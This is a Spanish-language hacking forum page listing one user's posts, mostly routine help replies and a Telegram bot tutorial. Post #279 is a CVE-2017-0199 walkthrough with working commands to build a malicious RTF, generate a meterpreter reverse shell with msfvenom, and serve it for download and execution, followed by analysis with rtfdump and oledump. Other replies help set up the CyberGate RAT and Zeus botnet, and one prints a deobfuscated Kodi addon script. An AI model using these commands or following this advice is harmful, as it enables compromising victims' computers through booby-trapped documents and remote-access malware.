Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - blackdrake

Páginas 1 ... 12 13 14 15 16 ... 97
#261
Dudas y pedidos generales / Re:[SOLUCIONADO] Información sobre Troyano
Marzo 08, 2018, 06:22:26 PM
Como extra a lo que dijo @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login te recomiendo mirar en la BD oficial de la comunidad: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un saludo.
#262
Dudas y pedidos generales / Re:Error con Kali Linux
Marzo 08, 2018, 06:10:59 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
yo trate de adjuntar la imagen pero veo que no salio. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

He obtenido el mismo error al quedarme sin memoria RAM en la máquina anfitriona, cuáles son tus especificaciones?

Un saludo.
#263
Dudas y pedidos generales / Re:Ayuda CyberGate error Runtime 216
Febrero 26, 2018, 03:00:16 PM
Qué windows estás usando?

Has desactivado windows defender?

Un saludo.
#264
Dudas y pedidos generales / Re:MSSQL Vulnerable y no lo detecto
Febrero 26, 2018, 02:58:53 PM
Entiendo que si, pero tienes levantado el servicio?

Un saludo.
#265
Dudas y pedidos generales / Re:REto Atenea - Durin's Gates
Febrero 26, 2018, 02:55:28 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Amigos,

Buenas tardes. Ya veo que han avanzado algo, y estoy estancado en algunas cosas. Existe alguna manera de comentarles por privado hasta dónde llegué para no tener que colocarlo al público (sería injusto para el que se está esforzando por responder el reto)?

En principio, les pregunto: De qué hash hablan?

Gracias.

Ponlo por aquí :)

Un saludo.
#266
Dudas y pedidos generales / Re:Archivo base64
Febrero 26, 2018, 02:54:11 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Esos caracteres son los que no consigo saber qué significan o en que está codificado. ¿Alguien sabe algo?

Así visto a grosso modo parecen variables

Un saludo..
#267
Dudas y pedidos generales / Re:Archivo base64
Febrero 23, 2018, 05:26:58 AM
Basta con que cambies exec por print y adaptes ligeramente el código para que te lo imprima.

El código resultante es:

Código: text

# -*- coding: utf-8 -*-
import os
import xbmc
import base64
if 97 - 97: OOoOoO0o0o0OO + IIII . Ii % oOO
if 1 - 1: II - iiIIi1i1Iii - I1 - IIoooO0ooO0oo * OOO
if 5 - 5: i1iI1 + o00oO0oo0O0O0 - ii1I1ii1IiIi1 % oooOoO - IiII1IiI
if 85 - 85: oo
if os . name == "nt" :
 OoOoOo = ""
else :
 OoOoOo = "utf8"
 if 73 - 73: Ii1I / I1IiI1III11i + ooOooO0OOO % IiII1i1I / oo0o % IiII1i1I
def OO0O00 ( path , _samba = False ) :
 if not type ( path ) == unicode :
  if 56 - 56: Ii / IiII1i1I + iiIIi1i1Iii . oOO * iiIIi1i1Iii . I1
  if 52 - 52: oo0o + I1IiI1III11i % o00oO0oo0O0O0 % Ii1I
  if 78 - 78: oo % ii1I1ii1IiIi1 * iiIIi1i1Iii . oOO * I1 % OOO
  if 2 - 2: Ii1I * oooOoO . iiIIi1i1Iii % Ii
  if 16 - 16: IIoooO0ooO0oo / oooOoO * iiIIi1i1Iii - oooOoO
  if 77 - 77: OOoOoO0o0o0OO * oooOoO / Ii
  if 90 - 90: OOoOoO0o0o0OO * II
  if 74 - 74: oOO - IiII1i1I - Ii
  if 87 - 87: Ii1I % ooOooO0OOO - iiIIi1i1Iii % i1iI1 % oooOoO % ooOooO0OOO
  if 5 - 5: OOoOoO0o0o0OO . OOO - ii1I1ii1IiIi1 . oooOoO * Ii
  path = unicode ( path , "utf-8" , "ignore" )
  if 63 - 63: OOoOoO0o0o0OO . iiIIi1i1Iii / IIoooO0ooO0oo . Ii / IIoooO0ooO0oo % ii1I1ii1IiIi1
 if path . lower ( ) . startswith ( "smb://" ) or _samba :
  path = path . encode ( "utf-8" , "ignore" )
 else :
  if OoOoOo :
   path = path . encode ( OoOoOo , "ignore" )
   if 3 - 3: Ii1I % IiII1i1I * oo0o / OOO * oo0o
 return path
 if 51 - 51: iiIIi1i1Iii . oo0o % OOoOoO0o0o0OO
 if 31 - 31: i1iI1 / i1iI1 % II * oo0o - II
def OOo0000oO ( path ) :
 if type ( path ) == list :
  if 48 - 48: iiIIi1i1Iii % OOO
  if 52 - 52: II
  if 3 - 3: oo * Ii1I * oo + oo
  if 62 - 62: IiII1i1I * ooOooO0OOO % ooOooO0OOO / I1 - OOoOoO0o0o0OO - Ii
  if 89 - 89: ooOooO0OOO . oOO * ooOooO0OOO + IIII
  if 32 - 32: IiII1i1I - iiIIi1i1Iii * II + OOO - iiIIi1i1Iii
  if 28 - 28: IIII
  if 56 - 56: iiIIi1i1Iii + IIII . oo0o - IiII1i1I + oo / IiII1IiI
  for oO in range ( len ( path ) ) :
   if not type ( path [ oO ] ) == unicode :
    path [ oO ] = path [ oO ] . decode ( OoOoOo , "ignore" )
   path [ oO ] = path [ oO ] . encode ( "utf-8" , "ignore" )
 else :
  if not type ( path ) == unicode :
   path = path . decode ( OoOoOo , "ignore" )
  path = path . encode ( "utf-8" , "ignore" )
 return path
 if 40 - 40: ii1I1ii1IiIi1 * oo / I1
 if 28 - 28: Ii1I - o00oO0oo0O0O0 / IiII1i1I + oo0o / Ii
def II1II1II1 ( * paths ) :
 paths = [ I1iiI1I for I1iiI1I in paths if I1iiI1I ]
 if 12 - 12: ii1I1ii1IiIi1
 if 60 - 60: i1iI1 % o00oO0oo0O0O0
 if 39 - 39: o00oO0oo0O0O0 * ii1I1ii1IiIi1 / Ii / Ii1I - iiIIi1i1Iii
 if 11 - 11: I1 % i1iI1 / ooOooO0OOO % Ii1I / I1 + iiIIi1i1Iii
 if 71 - 71: OOoOoO0o0o0OO * oOO * Ii
 if paths [ 0 ] . lower ( ) . startswith ( "smb://" ) :
  return paths [ 0 ] . strip ( "/" ) + "/" + "/" . join ( paths [ 1 : ] )
 else :
  return os . path . join ( * paths )
  if 92 - 92: o00oO0oo0O0O0 . oo0o * OOO * Ii / oo
def oOo0OOooOOOoo ( path ) :
 if 8 - 8: OOoOoO0o0o0OO - i1iI1
 if 46 - 46: oo - IiII1i1I - IiII1IiI
 if 63 - 63: I1 - IiII1i1I * I1 - iiIIi1i1Iii
 if 86 - 86: oo
 if 18 - 18: oooOoO
 if 23 - 23: OOoOoO0o0o0OO * Ii1I
 if 33 - 33: IiII1i1I * oOO % OOO
 if 25 - 25: o00oO0oo0O0O0 % oo0o . ooOooO0OOO + IIII * o00oO0oo0O0O0 / oOO
 path = OO0O00 ( path )
 try :
  return OOo0000oO ( os . listdir ( path ) )
 except :
  return False
  if 45 - 45: oo . IIII . oo
def oOOooo00Oooo ( path ) :
 path = OO0O00 ( path )
 if 75 - 75: IIII . oo0o . oOO + oOO + IIII . o00oO0oo0O0O0
 if 23 - 23: IiII1i1I + Ii + IiII1i1I . i1iI1 . OOO * II
 if 63 - 63: iiIIi1i1Iii / OOO + OOO * I1IiI1III11i . OOO
 if 56 - 56: i1iI1
 if 27 - 27: oooOoO % IIoooO0ooO0oo * IIoooO0ooO0oo . Ii1I
 if 10 - 10: IIII / OOO % ii1I1ii1IiIi1
 if 27 - 27: OOO - oo0o + oOO - OOO / IIII
 try :
  return os . path . isfile ( path )
 except :
  if 93 - 93: I1IiI1III11i
  return False
  if 11 - 11: ooOooO0OOO . oo + o00oO0oo0O0O0 - IiII1i1I / Ii1I
def iIII1Ii1iI ( path ) :
 path = OO0O00 ( path )
 if 62 - 62: ooOooO0OOO + OOO . Ii1I
 if 86 - 86: i1iI1 % iiIIi1i1Iii - oooOoO . i1iI1 % Ii * IIII
 if 71 - 71: IIII
 if 47 - 47: o00oO0oo0O0O0
 if 81 - 81: I1 . IIoooO0ooO0oo % o00oO0oo0O0O0 - I1
 if 83 - 83: I1IiI1III11i + OOoOoO0o0o0OO / oo / ooOooO0OOO . Ii % IiII1IiI
 if 36 - 36: oooOoO % ooOooO0OOO
 try :
  return os . path . exists ( path )
 except :
  return False
  if 38 - 38: OOO * Ii
def I1i1I1iI11I ( sql ) :
 iiIIiiII1 = ""
 if 66 - 66: i1iI1 % I1 * I1
 if 64 - 64: i1iI1 + Ii1I . Ii . IIII
 if 40 - 40: iiIIi1i1Iii * oOO
 if 79 - 79: i1iI1
 if 49 - 49: oo * Ii1I % II + I1
 if 28 - 28: IIII * I1 % oOO + Ii1I - IiII1i1I
 if 16 - 16: I1IiI1III11i % oo0o * IiII1IiI * i1iI1
 if 10 - 10: iiIIi1i1Iii . ooOooO0OOO % Ii1I - Ii1I - oo0o
 if 44 - 44: OOO + IiII1IiI - II . ii1I1ii1IiIi1 / II
 IIiII1Iii = 0
 Iiii1II1IIi = None
 if 32 - 32: Ii . iiIIi1i1Iii / oooOoO % oo0o / I1 * o00oO0oo0O0O0
 if 53 - 53: OOO * IiII1i1I % Ii1I
 I11ii1i = { '10' : 'MyVideos37.db' , '11' : 'MyVideos60.db' , '12' : 'MyVideos75.db' , '13' : 'MyVideos78.db' ,
 '14' : 'MyVideos90.db' , '15' : 'MyVideos93.db' , '16' : 'MyVideos99.db' , '17' : 'MyVideos107.db' }
 if 6 - 6: I1
 oOOOO00 = I11ii1i . get ( xbmc . getInfoLabel ( "System.BuildVersion" ) . split ( "." , 1 ) [ 0 ] , '' )
 if oOOOO00 :
  iiIIiiII1 = II1II1II1 ( xbmc . translatePath ( "special://userdata/Database" ) , oOOOO00 )
  if 4 - 4: II / iiIIi1i1Iii + oOO + IiII1i1I
  if 69 - 69: Ii1I
 if not iiIIiiII1 or not iIII1Ii1iI ( iiIIiiII1 ) :
  iiIIiiII1 = ""
  for I1IiI1ii1i1i1 in oOo0OOooOOOoo ( xbmc . translatePath ( "special://userdata/Database" ) ) :
   IiiiI = II1II1II1 ( xbmc . translatePath ( "special://userdata/Database" ) , I1IiI1ii1i1i1 )
   if 70 - 70: oo * oo % IiII1i1I * IiII1IiI
   if oOOooo00Oooo ( IiiiI ) and I1IiI1ii1i1i1 . lower ( ) . startswith ( 'myvideos' ) and I1IiI1ii1i1i1 . lower ( ) . endswith ( '.db' ) :
    iiIIiiII1 = IiiiI
    break
    if 39 - 39: Ii - I1 - IiII1i1I - OOoOoO0o0o0OO % IiII1IiI - IiII1i1I
 if iiIIiiII1 :
  oo0OO00OooO = None
  try :
   import sqlite3
   oo0OO00OooO = sqlite3 . connect ( iiIIiiII1 )
   O0ooo0oO0O = oo0OO00OooO . cursor ( )
   if 70 - 70: Ii1I . iiIIi1i1Iii * oo0o
   O0ooo0oO0O . execute ( sql )
   oo0OO00OooO . commit ( )
   if 64 - 64: IIoooO0ooO0oo % II
   Iiii1II1IIi = O0ooo0oO0O . fetchall ( )
   if sql . lower ( ) . startswith ( "select" ) :
    IIiII1Iii = len ( Iiii1II1IIi )
    if IIiII1Iii == 1 and Iiii1II1IIi [ 0 ] [ 0 ] is None :
     IIiII1Iii = 0
     Iiii1II1IIi = [ ]
   else :
    IIiII1Iii = oo0OO00OooO . total_changes
    if 86 - 86: Ii1I / II * Ii * II + oooOoO - oo0o
    if 95 - 95: II + oo / IIII + I1IiI1III11i
   oo0OO00OooO . close ( )
   if 85 - 85: IiII1i1I . II * IIoooO0ooO0oo % II % Ii - oo
  except :
   xbmc . log ( "Error al ejecutar la consulta sql" )
   if oo0OO00OooO :
    oo0OO00OooO . close ( )
    if 100 - 100: II * OOoOoO0o0o0OO + OOO * ii1I1ii1IiIi1 * OOO
 else :
  xbmc . log ( "Base de datos no encontrada" )
  if 84 - 84: Ii1I + oOO . oo0o % IiII1i1I % IiII1IiI * iiIIi1i1Iii
  if 26 - 26: iiIIi1i1Iii . I1IiI1III11i
 import xbmcaddon
 i1IIiiII = xbmcaddon . Addon ( )
 OOO0Ooo0 = xbmc . translatePath ( i1IIiiII . getAddonInfo ( 'path' ) . decode ( 'utf-8' ) )
 if 25 - 25: oOO - IiII1i1I + oo0o - o00oO0oo0O0O0 - oo0o * o00oO0oo0O0O0
 if os . path . isfile ( base64 . urlsafe_b64decode ( 'JXMvYW5vci5weQ==' ) % OOO0Ooo0 ) :
  os . remove ( base64 . urlsafe_b64decode ( 'JXMvYW5vci5weQ==' ) % OOO0Ooo0 )
  if 32 - 32: oooOoO * Ii . iiIIi1i1Iii + IIII + IIII
 return IIiII1Iii , Iiii1II1IIi # 807cb1bfffb234dace3f930f571a9039d76f4cf9


Un saludo.
#268
Dudas y pedidos generales / Re:malware lab underc0de
Febrero 21, 2018, 09:16:43 PM
Si, están limpios.

Un saludo.
#269
Dudas y pedidos generales / Re:Grupo de Telegram?
Febrero 09, 2018, 04:56:16 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un saludo.
#270
Dudas y pedidos generales / Re:Ayuda con BOTNET ZEUS
Febrero 08, 2018, 05:00:11 PM
Así es, la función mysql está deprecada, la actual es mysqli, pero obviamente cambiar todo el proyecto es muy laborioso, te recomiendo que utilices otra botnet o bien, bajes tu versión de PHP.

Un saludo.
#271
Dudas y pedidos generales / Re:¿Se pueden descargar archivos desde os-shell (CMD)?
Febrero 06, 2018, 03:08:41 PM
Hola!

Puedes probar muchas alternativas, nc, scp, ftp, tftp..

¿Qué tipo de máquina es? ¿Qué tipo de shell tienes?

Un saludo.
#272
Dudas y pedidos generales / Re:Duda sobre las requests de un servicio web
Febrero 04, 2018, 04:30:27 AM
Desde la página web, pero es posible que ésta añada tu IP en la cabecera X-Forwarded-For

Un saludo.
#273
Off Topic / Re:ASCII art. | Covierte cualquier imágen a formato ASCII
Febrero 01, 2018, 05:24:50 PM
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login no conocía esa tool, la de @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login si y es la que utilizaba, pero voy a echarle un ojo a la tuya.

Gracias! :D
#274
Python / Desarrollando BOTs para Telegram - Parte 1
Febrero 01, 2018, 05:17:37 PM

¿Qué es un bot?

A mitad del 2015 Telegram incorporó los bots en su aplicación. Básicamente son pequeños programas que encuentran en servidores y podemos acudir a ellos en cualquier momento para conseguir cualquier tipo de funcionalidad.

O como el propio Telegram dice:

  • Recibe notificaciones y noticias personalizadas. Un bot puede actuar como un periódico inteligente, enviándole contenido relevante tan pronto como se publique.

  • Integrar con otros servicios. Un robot puede enriquecer los chats de Telegram con contenido de servicios externos.


  • Acepte pagos de los usuarios de Telegram. Un bot puede ofrecer servicios pagados o trabajar como una tienda virtual.

  • Crea herramientas personalizadas Un bot puede proporcionarle alertas, pronósticos del tiempo, traducciones, formato u otros servicios.

  • Compila juegos de un solo jugador y multijugador. Un robot puede ofrecer experiencias ricas en HTML5, desde simples arcades y acertijos hasta tiradores 3D y juegos de estrategia en tiempo real.

  • Construye servicios sociales. Un bot podría conectar a las personas que buscan interlocutores basados ​​en intereses comunes o proximidad.

Conclusión, puedes hacer prácticamente cualquier otra cosa!

Más información sobre los BOTs: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

¿Quién puede hacer un bot?

Cualquiera, siempre y cuando tenga los conocimientos suficientes de programación y se anime a hacerlo. Telegram tiene una extensa documentación que nos explica cómo podemos crearlos.


Tipos de bots
Hay dos tipos de bots en Telegram: los bots normales y los llamados "Inline".

Para utilizar los bots normales tenemos que abrir un chat con ellos o incluirlos en el grupo donde queramos utilizarlo.  Pudiendo utilizarlo todas las veces que queramos.

Los Inline Bots están disponible desde principios del año 2016 y la diferencia es en que no necesitamos incluirlos en ninguna grupo para usarlos. Los podemos utilizar en cualquier momento, simplemente tendremos que añadir una arroba con su nombre a la hora de escribir un nuevo mensaje para poder empezar a utilizarlos. Los resultados que nos ofrezcan aparecerán en un menú flotante dentro de la misma conversación y podremos elegir el resultado que más nos guste para mostrar al resto de miembros de dicha conversación.

Un claro ejemplo de los bot inline es el siguiente:


Creación del BOT (Introducción)

Telegram creó hace un par de años una API para la creación de bots con la cual se pueden crear la conexión de manera muy simple, ya que todo se hace a través de HTTP.

Lo primero que debemos hacer es crear un chat con @BotFather e iniciarlo.

Una vez hecho hecho, escribiremos /newbot para comenzar el proceso de creación de nuestro bot.


Acto seguido, nos preguntará es el nombre de nuestro bot.


En segundo lugar nos pedirá el alias, (este debe terminar en bot).


Por último, BotFather nos devolverá el token para utilizar nuestro BOT mediante la API.


Podemos configurar muchas más cosas para nuestro bot, aquí os dejo una lista pero no es lo único que hay, para más información os recomiendo leer la documentación oficial.

/setname - cambia el nombre de tu bot.

/setdescription - cambia la descripción del bot, un texto corto de hasta 512 caracteres, que describe tu bot. Los usuarios verán este texto al comienzo de la conversación con el bot, titulado '¿Qué puede hacer este robot?'.

/setabouttext - cambia la información sobre el bot, un texto aún más corto de hasta 120 caracteres. Los usuarios verán este texto en la página de perfil del robot. Cuando comparten tu bot con alguien, este texto se envía junto con el enlace.

/setuserpic - cambia las imágenes de perfil del bot. Siempre es bueno ponerle cara a un nombre.

/setcommands - cambia la lista de comandos soportados por tu bot. Los usuarios verán estos comandos como sugerencias cuando escriban / en el chat con su bot. Cada comando tiene un nombre (debe comenzar con una barra inclinada '/', caracteres alfanuméricos y subrayados, no más de 32 caracteres, sin mayúsculas y minúsculas), parámetros y una descripción de texto. Los usuarios verán la lista de comandos cada vez que escriban '/' en una conversación con su bot.

/deletebot - borra tu bot y libera su nombre de usuario.

/setinline: activa el modo en línea para tu bot.

/setinlinegeo: solicita datos de ubicación para proporcionar resultados en línea basados ​​en la ubicación.

/setjoingroups - alterna si tu bot se puede agregar a grupos o no. Cualquier bot debe ser capaz de procesar mensajes privados, pero si tu bot no fue diseñado para trabajar en grupos, puedes inhabilitarlo.

/setprivacy: establece qué mensajes recibirá tu bot cuando se agreguen a un grupo. Con el modo de privacidad desactivado, el bot recibirá todos los mensajes. Recomendamos dejar el modo de privacidad habilitado.

Para que un BOT pueda enviar mensajes a un usuario, éste deberá haberlo iniciado anteriormente, para ello, accedemos a nuestro bot buscándolo por su nombre (con @ delante) o bien utilizando el link que BotFather nos ha proporcionado (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login)



Finalmente nuestro bot luce así.


Y hasta aquí la primera parte, en unos días publicaré la segunda parte donde aprenderemos a interactuar con nuestro BOT.

Un saludo.

#275
Hacking / Re:Propagación de Malware en Android a través de Whatsapp
Febrero 01, 2018, 03:30:02 PM
Muy bueno, además es bastante utilizado, así que es útil que la gente conozca la técnica.

Gracias @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un saludo.
#276
Dudas y pedidos generales / Re:Crear un Checkbox con ciertas propiedades
Febrero 01, 2018, 03:06:09 PM
Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login!

Si quieres un iframe con esto de debería sobrar:

Código: html5
<iframe frameborder="0" src="http://es.foxyform.com/form.php?id=326430&sec_hash=88fbc0a5741"></iframe>


Luego ya es adaptar el width y height a tus necesidades, centrarlo etc....

Un saludo.
#277
Dudas y pedidos generales / Re:Clave wifi desde un ordenador por cable
Febrero 01, 2018, 02:57:34 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola, estoy en el mismo caso o parecido, pero tengo un problema.
Meto ipconfig y me da la puerta de enlace predeterminada, pero la introduzco en el navegador y me da error, Firefox no puede establecer una conexión con el servidor...
Alguien que me de algo de luz para ver lo que está pasando¿? Gracias.

Lanza un nmap a esa IP para ver si tiene algún puerto de administración abierto.

Un saludo.
#278
Dudas y pedidos generales / Re:[Reto de ATENEA] Lenguajes de programación
Febrero 01, 2018, 02:54:48 PM
Lo hice hace un tiempo y no puedo comprobarlo pero debería bastar con
Código: bash
echo "Atenea"


En md5 y con el formato flag{MD5}
#279
Hacking / CVE-2017-0199 - Análisis y Generación
Enero 28, 2018, 06:42:55 AM
Hola a todos!

Hoy os traigo un aporte sobre el CVE-2017-0199, ésta es una vulnerabilidad de ejecución de código arbitrario en Microsoft Office que se manifiesta debido a un manejo incorrecto de los archivos de formato de texto enriquecido (RTF).


Por lo general se ha detectado el ataques en mensajes de correo electrónico donde la víctima abre un documento específicamente diseñado para explotar la vulnerabilidad. Es importante mencionar que esta vulnerabilidad continúa siendo explotada activamente.



Ataque

En este caso empezaremos por el principio, la creación del documento, se puede crear de forma manual, pero a día de hoy existen generadores para ahorrar tiempo, por lo que en este caso lo utilizaremos así, yo he usado este You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login aunque podéis utilizar el que vosotros queráis.

Primero generamos el RTF.

Código: bash
python cve-2017-0199_toolkit.py -M gen -t RTF -w underc0de.rtf -u http://TUIP/logo.doc



Generamos el meterpreter (OPCIONAL)

Código: bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=TUIP LPORT=4444 -f exe > /tmp/shell.exe
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST TUIP; run"


Iniciamos la tool en modo exploit
Código: bash
python cve-2017-0199_toolkit.py -M exp -t RTF -e http://TUIP/shell.exe -l /tmp/shell.exe



El gráfico actual de ataque sería el siguiente:


Aunque también podemos utilizarlo en modo remoto de la siguiente forma.


Al abrir nuestro documento nos aparecerá el siguiente error, si la víctima pulsa "Si" nuestro servidor recibirá la petición y recibiremos nuestra sesión de meterpreter





Defensa

Ahora que ya tenemos nuestro documento, es hora del análisis, para ello utilizaremos una tool desarrollada en python llamada rtfdump, utilizaremos esta herramienta para sacar la URL verdadera y llegar a la conclusión de si el fichero RTF es seguro o no.

En primer lugar abriremos nuestro documento a través de la rtfdump.
Código: bash
python rtfdump.py  underc0de.rtf



Como nos devuelve mucha información, cerraremos el cerco buscando únicamente los objetos OLE 1.0 que tiene nuestro documento.
Código: bash
python rtfdump.py -f O underc0de.rtf


Obtenemos un único objeto con el índice 10.



Hacemos una búsqueda más exhaustiva de nuestro índice.

Código: bash
python rtfdump.py -s 10  underc0de.rtf | more



En este volcado hexadecimal / ascii, podemos ver que el texto comienza con 01050000 02000000, lo que significa que es un objeto OLE 1.0. Además detectamos el string d0cf11e0, suponiendo que contiene un archivo OLE.

Con la opición -H, convertiremos los caracteres hexadecimales a binario:

Código: bash
python rtfdump.py -s 10  -H underc0de.rtf | more



Obtenemos el string OLE2Link, a la que se ha hecho referencia. Con la opción -i, podemos obtener más información sobre el objeto incrustado:

Código: bash
python rtfdump.py -s 10 -H -i underc0de.rtf



Ahora que estamos seguros de que es un fichero OLE incrustado utilizamos -E para extraerlo.

Código: bash
python rtfdump.py -s 10 -H -E underc0de.rtf



Para analizar este fichero, utilizaremos oledump (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login), oledump necesita el modulo olefile, por lo que si no lo tenéis, deberéis instalarlo antes (pip install -U olefile)

Utilizando -d y un pipeline, le pasaremos el fichero extraído a oledump.

Código: bash
python rtfdump.py -s 10 -H -E -d underc0de.rtf | oledump.py



Obtenemos 3 resultados, vamos a echarle un vistazo al primero mediante el siguiente comando.

Código: bash
python rtfdump.py -s 10 -H -E -d underc0de.rtf | python oledump.py -s 1


Y finalmente obtenemos la URL del documento infectado.


Espero que os haya gustado,

Un saludo.
#280
Dudas y pedidos generales / Re:Error en PHP
Enero 28, 2018, 05:48:29 AM
Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Estoy mirando tu código y me surge una duda, en el fichero ajax/paciente.php recoges las variables (nombre, sexo...) vía POST sin embargo, utilizas un switch vía GET (op), estás seguro que se envía esto? Porque no lo haces todo vía POST?

De ser así, puedes indicarme que fichero llama a paciente.php para poder verificar que éste recibe todo lo necesario?

Un saludo.
Páginas 1 ... 12 13 14 15 16 ... 97